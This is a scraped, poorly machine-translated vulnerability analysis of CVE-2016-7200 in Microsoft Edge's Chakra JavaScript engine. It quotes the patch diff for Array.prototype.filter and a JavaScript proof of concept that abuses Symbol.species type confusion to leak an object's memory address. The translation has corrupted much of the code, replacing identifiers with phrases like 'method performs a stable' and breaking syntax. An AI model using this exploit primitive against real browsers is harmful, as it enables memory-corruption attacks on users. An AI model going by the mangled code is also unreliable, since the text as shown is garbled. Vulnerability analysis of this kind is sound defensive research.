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HistoryMay 21, 2017 - 12:00 a.m.

Windows 10 x64 Edge CVE-2016-7200 & CVE-2016-7201 vulnerability analysis and exploit-vulnerability warning-the black bar safety net


0.972 High




The ## 1. Analysis of the environment

Operating system: Windows 10 x64 Professional Edition 10.0.14393 browser: Microsoft Edge x64 38.14393.0

2. CVE-2016-7200 analysis

This is happening in the JavascriptArray::FilterHelper, due to the type of Confusion caused by the vulnerability, look at the commit

template <typename T> Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
{ if (args. Info. Count < 2 || ! JavascriptConversion::IsCallable(args[1]))
JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u(“Array. prototype. filter”));

RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]); Var method performs a stable = nullptr; if (args. Info. Count > 2)
method performs a stable = args[2];
} else {
method performs a stable = scriptContext->GetLibrary()->GetUndefined();
} // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object. - RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);

  • bool isBuiltinArrayCtor = true;
  • RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext, nullptr, nullptr, &isBuiltinArrayCtor);
    JavascriptArray* newArr = nullptr; if (newObj == nullptr)
    newArr = scriptContext->GetLibrary()->CreateArray(0);
    newObj = newArr;
    } else { // If the new object we created is an array, remember that as it will save us time setting properties in the object below if (JavascriptArray::Is(newObj))
    +#if ENABLE_COPYONACCESS_ARRAY + JavascriptLibrary::CheckAndConvertCopyOnAccessNativeintarray<Var>(newObj);
    +#endif newArr = JavascriptArray::FromVar(newObj);
    } Var element = nullptr; Var selected = nullptr; if (pArr)
    Assert(length <= MaxArrayLength);
    uint32 i = 0; for (uint32 k = 0; k < length; k++)
    { if (! pArr->DirectGetItemAtFull(k, &element))
    { continue;

selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), The method performs a stable,
JavascriptNumber::ToVar(k, scriptContext),
pArr); if (JavascriptConversion::ToBoolean(selected, scriptContext))
{ // Try to fast path if the return object is an array - if (newArr)

  • if (newArr && isBuiltinArrayCtor)
    newArr->DirectSetItemAt(i, element);

Look under the POC

var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)). the slice(); var [hi, lo] = PutDataAndGetAddr(x); function PutDataAndGetAddr(t) { var d = new Array(1,2,3); class dummy { constructor() { return d;
} class MyArray extends Array { static get Symbol. species { return dummy;
} var a = new Array({}, t, “theori”, 7, 7, 7, 7, 7); function test(i) { return true;

a.__ proto__ = MyArray. prototype; var o = a. filter(test); var h = []; for (item in o) { var n = new Number(o[item]); if (n < 0) {
n = n + 0x100000000;
h. push(n);
} return [h[3], h[2]];

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